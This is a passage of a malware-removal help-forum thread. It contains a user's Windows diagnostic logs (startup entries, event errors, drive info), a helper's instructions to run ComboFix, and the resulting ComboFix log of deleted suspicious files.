MSCONFIG\startupfolder: C:^Users^Ric^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^DING!.lnk => C:\Windows\pss\DING!.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Ric^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Ric^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^eFax 4.4.lnk => C:\Windows\pss\eFax 4.4.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeCS5ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: Amazon Cloud Player => "C:\Users\Ric\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe"
MSCONFIG\startupreg: Amazon Music => "C:\Users\Ric\AppData\Local\Amazon Music\Amazon Music Helper.exe"
MSCONFIG\startupreg: AOL Fast Start => "C:\Program Files (x86)\AOL Desktop 9.7a\AOL.EXE" -b
MSCONFIG\startupreg: ApplePhotoStreams => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
MSCONFIG\startupreg: AppleSyncNotifier => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: CanonQuickMenu => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE /logon
MSCONFIG\startupreg: Carbonite Backup => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteUI.exe
MSCONFIG\startupreg: CMCService => "C:\Program Files (x86)\ATI\Catalyst Media Center\CMCService.exe"
MSCONFIG\startupreg: CPMonitor => "C:\Program Files (x86)\Roxio 2011\5.0\CPMonitor.exe"
MSCONFIG\startupreg: Dell Webcam Central => "C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe" /mode2
MSCONFIG\startupreg: DellSystemDetect => C:\Users\Ric\AppData\Local\Apps\2.0\KV0A55O0.XOG\GVHOPR7A.3VW\dell..tion_0f612f649c4a10af_0005.0008_a4204ff54ae5d3ac\DellSystemDetect.exe
MSCONFIG\startupreg: Desktop Disc Tool => "C:\Program Files (x86)\Roxio 2011\Roxio Burn\RoxioBurnLauncher.exe"
MSCONFIG\startupreg: dldtamon => "C:\Program Files (x86)\Dell V305\dldtamon.exe"
MSCONFIG\startupreg: dldtmon.exe => "C:\Program Files (x86)\Dell V305\dldtmon.exe"
MSCONFIG\startupreg: dleamon.exe => "C:\Program Files (x86)\Dell V310-V510 Series\dleamon.exe"
MSCONFIG\startupreg: eFax 4.4 => "C:\Program Files (x86)\eFax Messenger 4.4\J2GDllCmd.exe" /R
MSCONFIG\startupreg: EvtMgr6 => C:\Program Files\Logitech\SetPointP\SetPoint.exe /launchGaming
MSCONFIG\startupreg: EzPrint => "C:\Program Files (x86)\Dell V310-V510 Series\ezprint.exe"
MSCONFIG\startupreg: Fitbit Connect => "C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe" /autorun
MSCONFIG\startupreg: Google Update => "C:\Users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: Google+ Auto Backup => "C:\Users\Ric\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe" /autostart
MSCONFIG\startupreg: HostManager => C:\Program Files (x86)\Common Files\AOL\1298744002\ee\AOLSoftware.exe
MSCONFIG\startupreg: IAAnotif => C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe
MSCONFIG\startupreg: IAStorIcon => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
MSCONFIG\startupreg: iCloudServices => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
MSCONFIG\startupreg: IJNetworkScannerSelectorEX => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe /FORCE
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: MobileDocuments => C:\Program Files (x86)\Common Files\Apple\Internet Services\ubd.exe
MSCONFIG\startupreg: Nikon Message Center 2 => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe -s
MSCONFIG\startupreg: QuickSet => C:\Program Files\Dell\QuickSet\QuickSet.exe
MSCONFIG\startupreg: RoxWatchTray => "C:\Program Files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatchTray13.exe"
MSCONFIG\startupreg: SwitchBoard => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
MSCONFIG\startupreg: SynTPEnh => %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe
MSCONFIG\startupreg: SysTrayApp => C:\Program Files\IDT\WDM\sttray64.exe
MSCONFIG\startupreg: WirelessManager => C:\Program Files (x86)\Dell\Dell Mobile Broadband Manager\WirelessManager.exe

==================== Faulty Device Manager Devices =============

Name: Bluetooth Peripheral Device
Description: Bluetooth Peripheral Device
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Bluetooth Peripheral Device
Description: Bluetooth Peripheral Device
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

==================== Event log errors: =========================

Application errors:
==================
Error: (07/16/2014 10:46:20 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (07/16/2014 10:46:20 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (07/16/2014 09:23:41 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (07/16/2014 09:23:41 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (07/16/2014 09:21:00 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (07/16/2014 09:21:00 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (07/15/2014 02:48:08 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (07/15/2014 02:48:08 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (07/15/2014 02:10:57 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (07/15/2014 02:10:57 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

System errors:
=============
Error: (07/16/2014 10:42:08 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (07/16/2014 10:41:56 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
xnvdb

Error: (07/16/2014 10:41:55 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Roxio Hard Drive Watcher 12 service to connect.

Error: (07/16/2014 09:16:52 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (07/16/2014 09:16:31 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
xnvdb

Error: (07/16/2014 09:16:28 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Roxio Hard Drive Watcher 12 service to connect.

Error: (07/15/2014 11:19:57 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (07/15/2014 11:19:57 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (07/15/2014 02:44:16 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (07/15/2014 02:44:04 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
xnvdb

Microsoft Office Sessions:
=========================
Error: (07/16/2014 10:46:20 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

Error: (07/16/2014 10:46:20 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000

Error: (07/16/2014 09:23:41 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

Error: (07/16/2014 09:23:41 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000

Error: (07/16/2014 09:21:00 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

Error: (07/16/2014 09:21:00 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000

Error: (07/15/2014 02:48:08 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

Error: (07/15/2014 02:48:08 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000

Error: (07/15/2014 02:10:57 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

Error: (07/15/2014 02:10:57 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000

CodeIntegrity Errors:
===================================
  Date: 2013-10-10 08:31:39.527
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-10-10 08:31:39.521
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-10-10 08:31:39.515
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-10-10 08:31:39.509
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-10-10 08:18:00.543
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-10-10 08:18:00.537
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-10-10 08:18:00.534
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-10-10 08:18:00.530
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-08-26 09:10:28.073
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-08-26 09:10:28.058
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Percentage of memory in use: 69%
Total physical RAM: 8180.5 MB
Available physical RAM: 2477.18 MB
Total Pagefile: 16359.18 MB
Available Pagefile: 8378.18 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:448.14 GB) (Free:268.73 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 466 GB) (Disk ID: 78DBB486)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=18 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=448 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#4 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:05 PM

Posted 16 July 2014 - 03:26 PM

Ok.


Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)

#5 scooter2028

scooter2028
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:05 AM

Posted 16 July 2014 - 09:28 PM

Attached is the ComboFix log.

 

I ran this differently than the requested runs before.  After downloading
the executable, I shut the system down unplugged the network and rebooted. Then I ran ComboFix.exe.

The 'COM Surrogate' processes do not start when the system is not connected
to the network and never has during that uptime.

 

This means that ComboFix.exe would not be interfered with during execution,
but it also means that it would not 'witness' the problem I'm having.  Log below.

 

Should I try to run it with those nasty 'COM Surrogates'?

 

 

 

 

ComboFix 14-07-16.02 - Ric 07/16/2014  19:52:14.1.8 - x64
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.8180.6559 [GMT -4:00]
Running from: c:\users\Ric\Desktop\ComboFix.exe
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\install.exe
c:\programdata\PCDr\6426\AddOnDownloaded\073fb38f-0e69-479d-bca1-4f81ec9dcbf6.dll
c:\programdata\PCDr\6426\AddOnDownloaded\0bb0beb6-da93-477d-980d-15bb6e2df09c.dll
c:\programdata\PCDr\6426\AddOnDownloaded\0d06f79c-d0e6-4610-9a2b-d8f1a48f4252.dll
c:\programdata\PCDr\6426\AddOnDownloaded\0d461521-7dbf-4cec-a29e-936c88cdf8c9.dll
c:\programdata\PCDr\6426\AddOnDownloaded\100c3865-0c76-461b-b2fd-042d6d5fa7f6.dll
c:\programdata\PCDr\6426\AddOnDownloaded\173c4dd2-e93c-4725-b006-db1d8f465192.dll
c:\programdata\PCDr\6426\AddOnDownloaded\1b0b3c38-2b97-4f8d-954b-06296209b73d.dll
c:\programdata\PCDr\6426\AddOnDownloaded\1e0aaf9a-9947-4a7b-b1ae-8a89919438ed.dll
c:\programdata\PCDr\6426\AddOnDownloaded\263d6ac9-4f87-466c-947c-bd9af71d7035.dll
c:\programdata\PCDr\6426\AddOnDownloaded\2a6b5d0b-a2fc-4bdd-b3fe-6bbefb85b7e4.dll
c:\programdata\PCDr\6426\AddOnDownloaded\2eccd5d6-e118-4f76-97b6-ba56fb6c597a.dll
c:\programdata\PCDr\6426\AddOnDownloaded\3410f47b-5e8c-47c6-bf2c-234af4121d4c.dll
c:\programdata\PCDr\6426\AddOnDownloaded\378deb7f-049e-4a5e-83b2-5381dcd9e928.dll
c:\programdata\PCDr\6426\AddOnDownloaded\3972fea3-214c-4935-a7d1-96bf66115683.dll
c:\programdata\PCDr\6426\AddOnDownloaded\3b1c7acd-5e3e-4459-ab98-5109117e2341.dll
c:\programdata\PCDr\6426\AddOnDownloaded\434373b7-17f4-4a5e-9e8f-2c1bb65cd9e5.dll
c:\programdata\PCDr\6426\AddOnDownloaded\4546f2bc-b9d9-4667-abe7-b0bacc90279e.dll
c:\programdata\PCDr\6426\AddOnDownloaded\4804ced5-915b-48a3-a465-b8a5e02714bf.dll
c:\programdata\PCDr\6426\AddOnDownloaded\4818e109-9489-4cd8-9044-44defd8ec187.dll
c:\programdata\PCDr\6426\AddOnDownloaded\50441041-9037-4c34-842c-4a8523e700da.dll
c:\programdata\PCDr\6426\AddOnDownloaded\51fdf16e-ecb9-4fa4-8469-76fc9a22293b.dll
c:\programdata\PCDr\6426\AddOnDownloaded\57d7325c-8462-4866-a9ca-3f9228775fed.dll
c:\programdata\PCDr\6426\AddOnDownloaded\59be3af2-87f2-4d3a-b380-7509f3d47c40.dll
c:\programdata\PCDr\6426\AddOnDownloaded\62d1f0b0-bc9a-4f6c-bad7-93b19a91276a.dll
c:\programdata\PCDr\6426\AddOnDownloaded\64882123-3c6f-4e15-8579-c6d1ba56c9de.dll
c:\programdata\PCDr\6426\AddOnDownloaded\67c3d4fe-b638-467a-9fe2-c5813ade3330.dll
c:\programdata\PCDr\6426\AddOnDownloaded\6820b110-e483-4f1e-9b48-438f7916f078.dll
c:\programdata\PCDr\6426\AddOnDownloaded\6b5978fa-48d7-4309-a523-7e157768c0d8.dll
c:\programdata\PCDr\6426\AddOnDownloaded\6f4fb483-ce30-493a-8cb4-3e530ab1be5b.dll
c:\programdata\PCDr\6426\AddOnDownloaded\739db3eb-d3cd-4c86-a6ea-01a49984fa3b.dll
c:\programdata\PCDr\6426\AddOnDownloaded\7bd83798-7a02-4f50-83a2-b91cabcbd1f9.dll
c:\programdata\PCDr\6426\AddOnDownloaded\7bd91bf5-79bd-4c68-b85b-3c132cdb258a.dll
c:\programdata\PCDr\6426\AddOnDownloaded\7dbfef1a-6148-4748-a1b3-71627763a45a.dll
c:\programdata\PCDr\6426\AddOnDownloaded\813755dc-2229-47a2-b85b-19d0aaa641c9.dll
c:\programdata\PCDr\6426\AddOnDownloaded\872965c7-08b7-47fc-a74c-ff167590b71a.dll
c:\programdata\PCDr\6426\AddOnDownloaded\8745715d-dc8a-4b32-b6a6-89cd3d0cc3c5.dll
c:\programdata\PCDr\6426\AddOnDownloaded\8d357f17-07ad-4392-ba06-fb67564c98cd.dll
c:\programdata\PCDr\6426\AddOnDownloaded\934f6059-2d35-4bd9-a130-a17cb5563507.dll
c:\programdata\PCDr\6426\AddOnDownloaded\9c07cc30-4011-4e36-a63d-e59077a22429.dll
c:\programdata\PCDr\6426\AddOnDownloaded\a61f44a8-21a3-4c4a-a04b-993dfb73bf96.dll
c:\programdata\PCDr\6426\AddOnDownloaded\a9de0c84-9a7c-4638-9653-13aa8cf56e80.dll
c:\programdata\PCDr\6426\AddOnDownloaded\ad817bdc-639c-43e8-b06b-897bcb5b8f23.dll
c:\programdata\PCDr\6426\AddOnDownloaded\ae67b364-b69e-471e-b177-2459120b84d4.dll
c:\programdata\PCDr\6426\AddOnDownloaded\aeffdb78-a789-4b6a-b2c2-f85f9b4863e6.dll
c:\programdata\PCDr\6426\AddOnDownloaded\b2152f30-7380-4987-8fcf-e4c06952615d.dll
c:\programdata\PCDr\6426\AddOnDownloaded\b4cc2a4a-87f5-49cd-935c-18f1a80e65b7.dll
c:\programdata\PCDr\6426\AddOnDownloaded\ba005e12-3139-4327-9f7a-9f2ea6a6c841.dll
c:\programdata\PCDr\6426\AddOnDownloaded\bc1b45ef-7c18-4b8a-95cd-f77c43d4f7df.dll
c:\programdata\PCDr\6426\AddOnDownloaded\bc6fc708-5b6b-4a72-b336-09b3089baa7a.dll
c:\programdata\PCDr\6426\AddOnDownloaded\bea3f575-677a-4c92-89ca-7be8480c11a9.dll
c:\programdata\PCDr\6426\AddOnDownloaded\bf647bd7-dfb5-4746-a6b4-b7c2fdbbf3b1.dll
c:\programdata\PCDr\6426\AddOnDownloaded\c4211805-b43b-471d-81af-4e0589f8607b.dll
c:\programdata\PCDr\6426\AddOnDownloaded\c6bf01ba-05a7-4930-b8dd-7c5fd03e97ac.dll
c:\programdata\PCDr\6426\AddOnDownloaded\cdda52ec-6ccd-425a-8c72-b7bbdc8b3acd.dll
c:\programdata\PCDr\6426\AddOnDownloaded\d114d5a6-2ec4-4056-a365-d6281d97c6b6.dll
c:\programdata\PCDr\6426\AddOnDownloaded\d1f4dc82-bc4c-4916-b37c-3ab9c30ae468.dll
c:\programdata\PCDr\6426\AddOnDownloaded\d34c0cf7-889f-43dd-9283-b2b6f442aae3.dll
c:\programdata\PCDr\6426\AddOnDownloaded\d460bca3-24f0-49a7-beed-a064fad82750.dll
c:\programdata\PCDr\6426\AddOnDownloaded\ddb9fe5d-525c-4d5d-ac37-0bd10f2864f8.dll
c:\programdata\PCDr\6426\AddOnDownloaded\dfc97e68-74cd-4807-807f-ac146d81ec5d.dll
c:\programdata\PCDr\6426\AddOnDownloaded\e0db530c-27fc-4e55-af38-073796a09e9d.dll
c:\programdata\PCDr\6426\AddOnDownloaded\e45cd45a-4d7c-4802-881f-74582b847e5c.dll
c:\programdata\PCDr\6426\AddOnDownloaded\e5847967-7dc8-4833-8ca6-09af078c1bcb.dll
c:\programdata\PCDr\6426\AddOnDownloaded\e5a71f43-c979-4b3d-a544-9ed1dc6dc4c8.dll
c:\programdata\PCDr\6426\AddOnDownloaded\ef78c3e8-1d94-4219-8070-7617e119bba4.dll
c:\programdata\PCDr\6426\AddOnDownloaded\f06c5597-1a85-4d1f-ac16-a6fdd2a6bedc.dll
c:\programdata\PCDr\6426\AddOnDownloaded\f12de547-df4d-4236-9129-baac054f90ab.dll
c:\programdata\PCDr\6426\AddOnDownloaded\f9dc840b-c6f7-42a5-acec-50cc7a2827fd.dll
c:\users\Ric\AppData\Roaming\3C140A
c:\users\Ric\Documents\~WRL0001.tmp
c:\users\Ric\Documents\~WRL0002.tmp
c:\users\Ric\Documents\~WRL0005.tmp
c:\users\Ric\Documents\~WRL2938.tmp
c:\users\Ric\GoToAssistDownloadHelper.exe
.
.
(((((((((((((((((((((((((   Files Created from 2014-06-17 to 2014-07-17  )))))))))))))))))))))))))))))))
.
.
2014-07-17 00:04 . 2014-07-17 00:04 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-07-16 14:48 . 2014-07-16 15:13 -------- d-----w- C:\FRST
2014-07-14 16:08 . 2014-07-14 17:27 -------- d-----w- c:\windows\SysWow64\wbem\Performance
2014-07-14 15:20 . 2014-07-14 15:20 -------- d-----w- C:\RegBackup
2014-07-14 13:20 . 2014-07-14 13:20 -------- d-----w- c:\program files (x86)\Tweaking.com
2014-07-11 19:19 . 2014-07-11 19:19 -------- d-----w- c:\windows\ERUNT
2014-07-11 18:58 . 2014-07-12 17:01 -------- d-----w- C:\Kits
2014-07-06 18:20 . 2010-08-30 12:34 536576 ----a-w- c:\windows\SysWow64\sqlite3.dll
2014-07-06 18:17 . 2014-07-13 18:11 -------- d-----w- C:\AdwCleaner
2014-07-06 18:15 . 2014-07-06 18:15 -------- d-----w- c:\users\Ric\AppData\Local\GHISLER
2014-07-06 15:47 . 2014-07-14 15:00 122584 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-07-06 15:46 . 2014-07-06 15:46 -------- d-----w- c:\program files (x86)\Malwarebytes Anti-Malware
2014-07-06 15:46 . 2014-07-06 15:46 -------- d-----w- c:\programdata\Malwarebytes
2014-07-06 15:46 . 2014-05-12 11:26 63704 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-07-06 15:46 . 2014-05-12 11:26 91352 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-07-06 15:46 . 2014-05-12 11:25 25816 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-07-05 18:22 . 2014-07-09 19:33 -------- d-----w- c:\users\roy
2014-07-05 16:52 . 2014-07-13 17:30 -------- d-----w- C:\Roy
2014-06-25 23:54 . 2014-06-26 00:02 -------- d-----w- c:\users\Ric\AppData\Roaming\Feeqvena
2014-06-25 23:50 . 2014-07-06 17:39 -------- d-----w- c:\programdata\IculOnse
2014-06-18 13:49 . 2014-06-18 13:49 -------- d-----w- c:\programdata\Package Cache
2014-06-18 13:48 . 2014-06-18 13:48 -------- d-----w- C:\TDSSKiller_Quarantine
2014-06-18 13:47 . 2014-06-18 13:47 -------- d-----w- C:\AMD
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-07-16 23:35 . 2012-03-31 15:56 699056 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-07-16 23:35 . 2011-05-18 19:14 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-06-11 11:40 . 2011-02-26 01:47 95414520 ----a-w- c:\windows\system32\MRT.exe
2014-06-03 20:51 . 2011-02-26 06:12 18960 ----a-w- c:\windows\system32\drivers\LNonPnP.sys
2014-05-30 10:21 . 2014-06-11 11:33 23414784 ----a-w- c:\windows\system32\mshtml.dll
2014-05-30 10:02 . 2014-06-11 11:33 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-05-30 10:02 . 2014-06-11 11:33 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-05-30 09:45 . 2014-06-11 11:33 2768384 ----a-w- c:\windows\system32\iertutil.dll
2014-05-30 09:39 . 2014-06-11 11:33 548352 ----a-w- c:\windows\system32\vbscript.dll
2014-05-30 09:39 . 2014-06-11 11:33 66048 ----a-w- c:\windows\system32\iesetup.dll
2014-05-30 09:38 . 2014-06-11 11:33 48640 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-05-30 09:28 . 2014-06-11 11:33 51200 ----a-w- c:\windows\system32\jsproxy.dll
2014-05-30 09:27 . 2014-06-11 11:33 33792 ----a-w- c:\windows\system32\iernonce.dll
2014-05-30 09:24 . 2014-06-11 11:33 574976 ----a-w- c:\windows\system32\ieui.dll
2014-05-30 09:21 . 2014-06-11 11:33 139264 ----a-w- c:\windows\system32\ieUnatt.exe
2014-05-30 09:21 . 2014-06-11 11:33 111616 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-05-30 09:20 . 2014-06-11 11:33 752640 ----a-w- c:\windows\system32\jscript9diag.dll
2014-05-30 09:11 . 2014-06-11 11:33 940032 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-05-30 09:08 . 2014-06-11 11:33 5782528 ----a-w- c:\windows\system32\jscript9.dll
2014-05-30 09:06 . 2014-06-11 11:33 452096 ----a-w- c:\windows\system32\dxtmsft.dll
2014-05-30 09:02 . 2014-06-11 11:33 2724864 ----a-w- c:\windows\SysWow64\mshtml.tlb
2014-05-30 08:55 . 2014-06-11 11:33 38400 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-05-30 08:49 . 2014-06-11 11:33 195584 ----a-w- c:\windows\system32\msrating.dll
2014-05-30 08:46 . 2014-06-11 11:33 85504 ----a-w- c:\windows\system32\mshtmled.dll
2014-05-30 08:44 . 2014-06-11 11:33 455168 ----a-w- c:\windows\SysWow64\vbscript.dll
2014-05-30 08:44 . 2014-06-11 11:33 295424 ----a-w- c:\windows\system32\dxtrans.dll
2014-05-30 08:43 . 2014-06-11 11:33 61952 ----a-w- c:\windows\SysWow64\iesetup.dll
